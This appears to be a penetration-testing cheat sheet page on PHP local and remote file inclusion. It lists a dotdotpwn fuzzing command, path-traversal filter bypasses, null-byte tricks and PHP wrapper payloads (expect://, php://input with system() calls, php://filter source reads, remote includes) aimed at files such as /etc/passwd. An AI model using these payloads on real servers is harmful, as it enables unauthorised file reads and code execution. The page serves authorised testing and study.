php wrappers, LFI

dotdotpwn

Note: preinstalled in latest kali iso. Works for http, ftp, tftp

dotdotpwn -h IP -m MODE -f FILE-TO-FUZZ -U USER -P PASS

Workarounds

NOTE: Read the file that is running LFI to get more information about the code.

  • Bypassing filters using ....//

  • Using null byte %00: /etc/passwd%00

  • URL encoding techniques (double encoding)

LFI wordlist

  • /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt

.php wrappers

# protocol wraper
file=http://IP/
file=ftp://IP/
file=//IP/smb-share/file

# expect wrapper
# allows to run system commands
file=expect://id

# input wrapper
file=php://input
# needs to send POST data
<?php system('id'); ?> | <?php shell_exec('id'); ?>

# filter wrappers
file=php://filter/resource=PHP-FILE
file=filter/read=string.rot13/resource=PHP-FILE
file=php://filter/convert.base64-encode/resource=PHP-FILE

LFI to RCE (linux)

LFI Paths (linux)

LFI Paths (windows)

LFI PHP Code Analysis

The above code block includes any value given to the file paramter.

The above code block includes any value given to the file parameter as long as its in the downloads directory. To bypass use ../../../<>

The above code block includes any value given to the file parameter as long as its in the downloads directory and appends .php to the user input value. To bypass use ../../../<> and value ending with %00.

When there is substitution for ../, bypass using ....// as it will convert to ../

RFI PHP Code Analysis

Requirement for RFI to work is allow_url_fopen and allow_url_include

Previouspgp gpg cheatsheetNextport forwarding

Last updated

Was this helpful?